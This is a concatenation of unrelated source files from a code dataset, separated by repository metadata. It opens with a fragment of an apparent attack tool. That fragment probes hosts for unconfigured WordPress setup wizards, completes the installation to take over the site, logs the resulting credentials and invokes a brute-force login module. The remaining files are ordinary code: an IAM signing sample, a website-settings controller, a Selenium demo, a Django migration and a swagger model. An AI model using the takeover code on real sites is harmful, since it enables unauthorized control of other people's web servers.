                'language': 'en_US'
            }
            session.post('http://' + site + '/wp-admin/install.php?step=2', data=POSTDATA_Install,
                         headers=Headers, timeout=25)
    except:
        pass
    try:
        # Verify: the marker blog title appears on the login page only if the
        # install above actually completed.
        source = session.get('http://' + site + '/wp-login.php', timeout=10, headers=Headers).content
        if 'installed|jex' in str(source):
            with open('result/Wp-Installed.txt', 'a') as writer:
                writer.write(site + '/wp-login.php\n Username: {}\n'
                             ' Password: {}\n------------------------------------------\n'
                             .format(username, password))
            Login = Wordpress.Wordpress()
            Login.BruteForce(site, password, username)
            return printModule.returnYes(site, 'N/A', 'Wp-Install', 'Wordpress')
        else:
            with open('result/Wp-SetupFound.txt', 'a') as writer:
                writer.write('{}/wp-admin/setup-config.php\n'.format(site))
            return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
    except:
        return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
def Check(site, email):
    """Probe common WordPress install paths on `site`; on the first path whose
    setup wizard responds, hand off to WpInstall. Returns a printModule
    status line; any exception is treated as a negative result.
    """
    try:
        # Common locations where a WordPress tree may live.
        PATHz = [
            '',
            '/wordpress',
            '/wp',
            '/blog',
            '/test',
            '/site'
        ]
        x = 0
        for path in PATHz:
            C = requests.get('http://' + site + path + '/wp-admin/setup-config.php?step=0')
            if 'setup-config.php?step=1' in str(C.content):
                # Unconfigured WordPress found -> attempt the takeover install.
                x += 1
                return WpInstall(site + path, email)
        if x == 0:
            return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
    except:
        return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
|
[
"[email protected]"
] | |
b057a3a5c3f3098da54c67a78d50a565061a32c3
|
0dfa97730b9ad9c077868a045d89cc0d4b09f433
|
/tests/integration/goldens/credentials/samples/generated_samples/iamcredentials_generated_credentials_v1_iam_credentials_sign_blob_sync.py
|
ff60375d5635f5825a6f29c36bb0c61572147d95
|
[
"Apache-2.0"
] |
permissive
|
anukaal/gapic-generator-python
|
546c303aaf2e722956133b07abb0fb1fe581962f
|
e3b06895fa179a2038ee2b28e43054e1df617975
|
refs/heads/master
| 2023-08-24T23:16:32.305652 | 2021-10-09T15:12:14 | 2021-10-09T15:12:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,567 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for SignBlob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-iam-credentials
# [START iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
from google.iam import credentials_v1
def sample_sign_blob():
    """Snippet for sign_blob"""
    # Create a client
    client = credentials_v1.IAMCredentialsClient()
    # Initialize request argument(s)
    # `name` must be a real service-account resource path; `payload` is the
    # raw bytes to sign.
    request = credentials_v1.SignBlobRequest(
        name="projects/{project}/serviceAccounts/{service_account}",
        payload=b'payload_blob',
    )
    # Make the request
    response = client.sign_blob(request=request)
    # Handle response
    print(response)
# [END iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
|
[
"[email protected]"
] | |
b3cdcb8ef497d5e18564d7b7f47262c537e111e3
|
b89ec2839b4a6bd4e2d774f64be9138f4b71a97e
|
/dataent/website/doctype/website_settings/website_settings.py
|
4fc4412d550622749995427444bce0dbc835241c
|
[
"MIT"
] |
permissive
|
dataent/dataent
|
ec0e9a21d864bc0f7413ea39670584109c971855
|
c41bd5942ffe5513f4d921c4c0595c84bbc422b4
|
refs/heads/master
| 2022-12-14T08:33:48.008587 | 2019-07-09T18:49:21 | 2019-07-09T18:49:21 | 195,729,981 | 0 | 0 |
MIT
| 2022-12-09T17:23:49 | 2019-07-08T03:26:28 |
Python
|
UTF-8
|
Python
| false | false | 4,869 |
py
|
# Copyright (c) 2015, Dataent Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import dataent
from dataent import _
from dataent.utils import get_request_site_address, encode
from dataent.model.document import Document
from six.moves.urllib.parse import quote
from dataent.website.router import resolve_route
from dataent.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
    """Singleton doctype controller for the site-wide Website Settings.

    Validates the home page and the top-bar/footer menu hierarchies, and
    clears rendered-page caches whenever the settings change.
    """
    def validate(self):
        self.validate_top_bar_items()
        self.validate_footer_items()
        self.validate_home_page()

    def validate_home_page(self):
        # Skip during install: routes are not registered yet.
        if dataent.flags.in_install:
            return
        if self.home_page and not resolve_route(self.home_page):
            dataent.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
            self.home_page = ''

    def validate_top_bar_items(self):
        """validate url in top bar items"""
        for top_bar_item in self.get("top_bar_items"):
            if top_bar_item.parent_label:
                parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
                if not parent_label_item:
                    # invalid item
                    dataent.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
                elif not parent_label_item[0] or parent_label_item[0].url:
                    # parent cannot have url
                    # NOTE(review): `not parent_label_item[0]` looks intended to
                    # guard a missing match, yet it raises the "cannot have URL"
                    # message — confirm the condition is what was meant.
                    dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
                        top_bar_item.idx))

    def validate_footer_items(self):
        """validate url in top bar items"""
        for footer_item in self.get("footer_items"):
            if footer_item.parent_label:
                parent_label_item = self.get("footer_items", {"label": footer_item.parent_label})
                if not parent_label_item:
                    # invalid item
                    dataent.throw(_("{0} does not exist in row {1}").format(footer_item.parent_label, footer_item.idx))
                elif not parent_label_item[0] or parent_label_item[0].url:
                    # parent cannot have url
                    dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(footer_item.parent_label,
                        footer_item.idx))

    def on_update(self):
        self.clear_cache()

    def clear_cache(self):
        # make js and css
        # clear web cache (for menus!)
        dataent.clear_cache(user = 'Guest')
        from dataent.website.render import clear_cache
        clear_cache()
        # clears role based home pages
        dataent.clear_cache()
def get_website_settings():
    """Assemble the template-rendering context for the public website from
    the Website Settings singleton, app hooks, and the current request."""
    hooks = dataent.get_hooks()
    context = dataent._dict({
        'top_bar_items': get_items('top_bar_items'),
        'footer_items': get_items('footer_items'),
        "post_login": [
            {"label": _("My Account"), "url": "/me"},
            # {"class": "divider"},
            {"label": _("Logout"), "url": "/?cmd=web_logout"}
        ]
    })
    settings = dataent.get_single("Website Settings")
    # Copy simple scalar settings straight onto the context.
    for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
        "facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
        "disable_signup", "hide_footer_signup", "head_html", "title_prefix",
        "navbar_search"]:
        if hasattr(settings, k):
            context[k] = settings.get(k)
    if settings.address:
        context["footer_address"] = settings.address
    # Normalize checkbox-style settings to 0/1 ints.
    for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
        "disable_signup"]:
        context[k] = int(context.get(k) or 0)
    if dataent.request:
        context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
        context.encoded_title = quote(encode(context.title or ""), str(""))
    # Let installed apps mutate the context in place.
    for update_website_context in hooks.update_website_context or []:
        dataent.get_attr(update_website_context)(context)
    context.web_include_js = hooks.web_include_js or []
    context.web_include_css = hooks.web_include_css or []
    via_hooks = dataent.get_hooks("website_context")
    for key in via_hooks:
        context[key] = via_hooks[key]
        # Hook values arrive as lists; for scalar keys only the last
        # (highest-priority) override is kept.
        if key not in ("top_bar_items", "footer_items", "post_login") \
            and isinstance(context[key], (list, tuple)):
            context[key] = context[key][-1]
    add_website_theme(context)
    if not context.get("favicon"):
        context["favicon"] = "/assets/dataent/images/favicon.png"
    if settings.favicon and settings.favicon != "attach_files:":
        context["favicon"] = settings.favicon
    return context
def get_items(parentfield):
    """Return top-level Top Bar Items for `parentfield`, ordered by idx,
    with child items nested under their parent's 'child_items' list."""
    all_top_items = dataent.db.sql("""\
        select * from `tabTop Bar Item`
        where parent='Website Settings' and parentfield= %s
        order by idx asc""", parentfield, as_dict=1)
    top_items = []
    first_by_label = {}
    for item in all_top_items:
        if item['parent_label']:
            continue
        top_items.append(item)
        # Children attach to the *first* top item bearing their parent label.
        if item['label'] not in first_by_label:
            first_by_label[item['label']] = item
    for item in all_top_items:
        if not item['parent_label']:
            continue
        parent = first_by_label.get(item['parent_label'])
        if parent is None:
            continue
        if 'child_items' not in parent:
            parent['child_items'] = []
        parent['child_items'].append(item)
    return top_items
return top_items
@dataent.whitelist(allow_guest=True)
def is_chat_enabled():
    """Guest-accessible API: whether the 'chat_enable' flag is set on the
    Website Settings singleton."""
    return bool(dataent.db.get_single_value('Website Settings', 'chat_enable'))
|
[
"[email protected]"
] | |
b1561a5a09375df8219b095e33b192ffafb03de1
|
eb755b42aa2ec9e6ab63001a6293d5e225837086
|
/Other_web_spider/Phantomjs/Phantomjs_id_location.py
|
f4b494cfe8dbfb44c591643255e8da05cbfcbc6d
|
[] |
no_license
|
paramedick/python-web-crawlers
|
7c493cbc51c4189d0dabaeae6cfba84123f7401d
|
5deea2073583bbb8d229c6404680e543ebcdbc5b
|
refs/heads/master
| 2022-01-19T21:25:29.058709 | 2019-08-13T14:43:22 | 2019-08-13T14:43:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 209 |
py
|
# coding=utf-8
# Demo script: drive a real Firefox browser with Selenium WebDriver —
# open Baidu, type "python" into the search box (element id "kw"), then quit.
# NOTE(review): despite the directory name, this launches Firefox, not PhantomJS.
from selenium import webdriver
browser = webdriver.Firefox()
browser.get("http://www.baidu.com/")
browser.find_element_by_id("kw").send_keys("python")
# implicitly_wait sets the element-lookup timeout; it does not pause here.
browser.implicitly_wait(60)
browser.quit()
|
[
"[email protected]"
] | |
38e66487b8f3e6080d36fa5c19b8a95bc793311f
|
0e9f73d2ef1239b22e049ef6338362da7dbfb122
|
/source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0065_auto_20190209_2232.py
|
da99dbc20030cad9a96f28f1f13228b4442183bd
|
[] |
no_license
|
Andy-Mason/FatQuants
|
3c4bfafc29834af76b0be40e93b0e210e0ef5056
|
edd0e98f4599ef91adbdf4179164769ddd66c62a
|
refs/heads/master
| 2023-01-11T10:57:50.563742 | 2021-08-11T19:04:59 | 2021-08-11T19:04:59 | 73,127,295 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 661 |
py
|
# Generated by Django 2.1.3 on 2019-02-09 22:32
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add nullable float columns close_value and volume to TickerEodData."""

    dependencies = [
        ('ticker', '0064_auto_20190209_2231'),
    ]

    operations = [
        migrations.AddField(
            model_name='tickereoddata',
            name='close_value',
            field=models.FloatField(blank=True, db_column='close_value', null=True, verbose_name='Close'),
        ),
        migrations.AddField(
            model_name='tickereoddata',
            name='volume',
            field=models.FloatField(blank=True, db_column='volume', null=True, verbose_name='Volume'),
        ),
    ]
|
[
"[email protected]"
] | |
9b065ad3bc64f06b7fcaff92d27fb2ee90ecfe6e
|
fc58366ed416de97380df7040453c9990deb7faa
|
/tools/dockerize/webportal/usr/lib/python2.7/site-packages/oslo_db/tests/old_import_api/utils.py
|
44eb1aeb24eb802ae554e3fcfda13866332912a7
|
[
"Apache-2.0"
] |
permissive
|
foruy/openflow-multiopenstack
|
eb51e37b2892074234ebdd5b501b24aa1f72fb86
|
74140b041ac25ed83898ff3998e8dcbed35572bb
|
refs/heads/master
| 2016-09-13T08:24:09.713883 | 2016-05-19T01:16:58 | 2016-05-19T01:16:58 | 58,977,485 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,310 |
py
|
# Copyright 2010-2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo.config import cfg
from oslotest import base as test_base
from oslotest import moxstubout
import six
if six.PY3:
    # contextlib.nested was removed in Python 3; emulate it with ExitStack so
    # callers can still enter a variable number of context managers at once.
    @contextlib.contextmanager
    def nested(*contexts):
        with contextlib.ExitStack() as stack:
            yield [stack.enter_context(c) for c in contexts]
else:
    nested = contextlib.nested
class BaseTestCase(test_base.BaseTestCase):
    """oslotest base case wired with mox stubs and oslo.config cleanup."""

    def setUp(self, conf=cfg.CONF):
        super(BaseTestCase, self).setUp()
        # Expose the mox fixture's mock/stub helpers directly on the test case.
        moxfixture = self.useFixture(moxstubout.MoxStubout())
        self.mox = moxfixture.mox
        self.stubs = moxfixture.stubs
        self.conf = conf
        # Restore global config overrides after every test.
        self.addCleanup(self.conf.reset)
|
[
"[email protected]"
] | |
f44c79dba52af15a4c324b94646a2e32d5a6143e
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.65_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=90/sched.py
|
73271d93d6d30c676753279395b2f3b6ba2f57c3
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 259 |
py
|
-X FMLP -Q 0 -L 3 93 400
-X FMLP -Q 0 -L 3 80 400
-X FMLP -Q 1 -L 2 79 250
-X FMLP -Q 1 -L 2 57 175
-X FMLP -Q 2 -L 1 54 200
-X FMLP -Q 2 -L 1 39 400
-X FMLP -Q 3 -L 1 37 125
-X FMLP -Q 3 -L 1 33 200
29 150
18 150
16 150
11 125
11 125
|
[
"[email protected]"
] | |
503cdbd13ac9e95d89d2847aabb527de1c810769
|
369b7f114f9bd9b45dd5fef77a070cb73abb68d1
|
/handle/itl/h20180123/insertFundInvestLog.py
|
0754801c39b9a7088aaa3f77d47ee88123974bf7
|
[] |
no_license
|
lyjloveabc/thor_handle
|
d790ee25317f724825c94a6b346a034ec0ae6e3d
|
8b9eda97ec873f3bf1732a428898a04d6a55c0af
|
refs/heads/master
| 2021-12-27T10:15:16.668264 | 2021-08-16T13:45:34 | 2021-08-16T13:45:34 | 84,824,162 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 571 |
py
|
import json
import requests
class InsertFundInvestLog:
def __init__(self):
# self.ENV = 'http://127.0.0.1:7001'
self.ENV = 'http://127.0.0.1:7001'
self.ENV_PROD = 'http://121.43.166.200:7001'
def handle(self):
with open('fundInvestLog_20180301.json', 'r') as f:
data = json.load(f)
for row in data:
response = requests.post(self.ENV_PROD + '/fundInvestLog/fundInvestLog', data=row)
print(response.text)
if __name__ == '__main__':
ifil = InsertFundInvestLog()
ifil.handle()
|
[
"[email protected]"
] | |
38986d4a704fb788926d73c8dcd2ed3bad07d847
|
45de3aa97525713e3a452c18dcabe61ac9cf0877
|
/src/primaires/objet/types/indefini.py
|
72fd243688f6d99b9e1d5c92bccd62e605901e8d
|
[
"BSD-3-Clause"
] |
permissive
|
stormi/tsunami
|
95a6da188eadea3620c70f7028f32806ee2ec0d1
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
refs/heads/master
| 2020-12-26T04:27:13.578652 | 2015-11-17T21:32:38 | 2015-11-17T21:32:38 | 25,606,146 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,744 |
py
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type Indefini."""
from .base import BaseType
class Indefini(BaseType):
"""Type d'objet: indéfini.
"""
nom_type = "indéfini"
|
[
"[email protected]"
] | |
e20e7f340b0e719fa019c02d2a227a6589f4cc4f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_baccalaureates.py
|
b6b3d264696b8bd5b102cbd3f2ddde23ad54b79c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
from xai.brain.wordbase.nouns._baccalaureate import _BACCALAUREATE
#calss header
class _BACCALAUREATES(_BACCALAUREATE, ):
def __init__(self,):
_BACCALAUREATE.__init__(self)
self.name = "BACCALAUREATES"
self.specie = 'nouns'
self.basic = "baccalaureate"
self.jsondata = {}
|
[
"[email protected]"
] | |
e73cfc2cdec009c867b3c766a6a035d38f33dfd6
|
b3ab2979dd8638b244abdb2dcf8da26d45d7b730
|
/cloudcheckr_cmx_client/models/azure_csp_authorization_request_model.py
|
e76c907e4fd2a4a72db3231108f61a129ace91ae
|
[] |
no_license
|
CU-CommunityApps/ct-cloudcheckr-cmx-client
|
4b3d9b82c5dfdaf24f8f443526868e971d8d1b15
|
18ac9fd4d6c4ae799c0d21745eaecd783da68c0c
|
refs/heads/main
| 2023-03-03T19:53:57.685925 | 2021-02-09T13:05:07 | 2021-02-09T13:05:07 | 329,308,757 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,134 |
py
|
# coding: utf-8
"""
CloudCheckr API
CloudCheckr API # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AzureCspAuthorizationRequestModel(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purchase_model': 'str',
'region_group': 'str'
}
attribute_map = {
'purchase_model': 'purchaseModel',
'region_group': 'regionGroup'
}
def __init__(self, purchase_model=None, region_group=None): # noqa: E501
"""AzureCspAuthorizationRequestModel - a model defined in Swagger""" # noqa: E501
self._purchase_model = None
self._region_group = None
self.discriminator = None
if purchase_model is not None:
self.purchase_model = purchase_model
if region_group is not None:
self.region_group = region_group
@property
def purchase_model(self):
"""Gets the purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's purchase model. # noqa: E501
:return: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._purchase_model
@purchase_model.setter
def purchase_model(self, purchase_model):
"""Sets the purchase_model of this AzureCspAuthorizationRequestModel.
The account's purchase model. # noqa: E501
:param purchase_model: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["AzurePlan", "Classic"] # noqa: E501
if purchase_model not in allowed_values:
raise ValueError(
"Invalid value for `purchase_model` ({0}), must be one of {1}" # noqa: E501
.format(purchase_model, allowed_values)
)
self._purchase_model = purchase_model
@property
def region_group(self):
"""Gets the region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:return: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._region_group
@region_group.setter
def region_group(self, region_group):
"""Sets the region_group of this AzureCspAuthorizationRequestModel.
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:param region_group: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["Commercial", "UsGov", "Germany"] # noqa: E501
if region_group not in allowed_values:
raise ValueError(
"Invalid value for `region_group` ({0}), must be one of {1}" # noqa: E501
.format(region_group, allowed_values)
)
self._region_group = region_group
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AzureCspAuthorizationRequestModel, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AzureCspAuthorizationRequestModel):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.